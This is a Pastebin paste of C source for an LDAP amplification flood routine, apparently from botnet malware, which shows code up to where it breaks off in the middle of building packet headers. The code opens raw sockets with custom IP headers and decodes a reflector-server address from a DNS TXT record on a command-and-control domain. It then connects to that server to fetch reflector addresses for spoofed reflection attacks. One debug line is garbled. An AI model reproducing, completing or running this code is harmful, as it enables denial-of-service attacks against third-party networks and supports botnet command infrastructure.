Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // LDAP amplification flood
- void flood_ldap(struct target *t, uint16_t port, uint8_t num_of_targets)
- {
- #ifdef DEBUG
- printf("In LDAP\n");
- #endif
- int i = 0;
- struct reflectors *f;
- int fd = -1;
- struct sockaddr_in dest_addr;
- struct resolve *dns;
- struct entry *e;
- char buf[DNS_TXT_MAX_SIZE];
- char buf2[MAX_REFLECTORS * 4 + 1];
- int ret = 0;
- char *s = buf2;
- int fd2 = -1;
- char *data = (char *)calloc(num_of_targets, sizeof(char **));
- int j = 0;
- struct request r;
- r.vector = htons(VECTOR_LDAP);
- r.count = htonl(MAX_REFLECTORS);
- if((fd2 = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
- {
- #ifdef DEBUG
- printf("Failed to initilize the raw socket, check your privileges\n");
- #endif
- free(data);
- return;
- }
- i = 1;
- if(setsockopt(fd2, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) == -1)
- {
- #ifdef DEBUG
- printf("Failed to set IP_HDRINCL\n");
- #endif
- free(data);
- close(fd2);
- return;
- }
- if((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
- {
- close(fd2);
- free(data);
- return;
- }
- e = retrieve_entry(ENTRY_CNC_DOMAIN);
- if(!(dns = dns_lookup(e->buf, QUERY_TYPE_TXT)))
- {
- #ifdef DEBUG
- printf("Failed to make the DNS query to retrieve the reflector server address, returning\n");
- #endif
- free(dns);
- close(fd);
- close(fd2);
- free(data);
- return;
- }
- for(i = 0; i < dns->data_len; i++)
- buf[i] = dns->buf[i];
- for(i = 0; i < dns->data_len; i += 2)
- {
- char tmp = buf[i];
- buf[i] = buf[i + 1];
- buf[i + 1] = tmp;
- }
- util_null(dns->buf, 0, dns->data_len);
- decode(buf, dns->buf, dns->data_len);
- dns->data_len = util_strlen(dns->buf);
- if(dns->data_len < 1 || dns->data_len > 15)
- {
- #ifdef DEBUG
- printf("Invalid reflector server address length retrieved, returning\n");
- #endif
- free(dns);
- close(fd);
- close(fd2);
- free(data);
- return;
- }
- #ifdef DEBUG
- printf("Received reflector server address %s\n", dns->buf);
- #endif
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(REFLECTOR_SERVER_PORT);
- dest_addr.sin_addr.s_addr = inet_addr(dns->buf);
- if(connect(fd, (struct sockaddr_in *)&dest_addr, sizeof(dest_addr)) == -1)
- {
- #ifdef DEBUG
- printf("Failed to connect to the reflector server, returning\n");
- #endif
- free(dns);
- close(fd);
- close(fd2);
- free(data);
- return;
- }
- #ifdef DEBUG
- printf("Connected to the reflector server!\n");
- #endif
- if(send(fd, &r, sizeof(r), MSG_NOSIGNAL) < 1)
- {
- #ifdef DEBUG
- printf("Failed to request the vector/count\n");
- #endif
- free(dns);
- close(fd);
- close(fd2);
- free(data);
- return;
- }
- #ifdef DEBUG
- printf("Successfully requested %d reflectors\n", ntohl(r.count));
- #endif
- ret = recv(fd, buf2, MAX_REFLECTORS * 4 + 1, 0);
- if(ret < 1)
- {
- #ifdef DEBUG
- printf("Failed to retrieve reflectors\n");
- #endif
- free(dns);
- close(fd);
- close(fd2);
- free(data);
- return;
- }
- #ifdef DEBUG
- printf("Processing reflectors...\n");
- #endif
- f = (struct reflectors *)calloc(MAX_REFLECTORS, sizeof(struct reflectors));
- for(i = 0; i < MAX_REFLECTORS; i++)
- {
- f[i].address = *((uint32_t *)s);
- s += sizeof(uint32_t);
- #ifdef DEBUG
- printf("Processed reflector %d.%d.%d.%d\n", f[i].address & 0xff, (f[i].address >> & 0xff, (f[i].address >> 16) & 0xff, (f[i].address >> 24) & 0xff);
- #endif
- }
- #ifdef DEBUG
- printf("Successfully processed reflectors\n");
- #endif
- for(i = 0; i < num_of_targets; i++)
- {
- struct iphdr *ip_header;
- struct udphd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement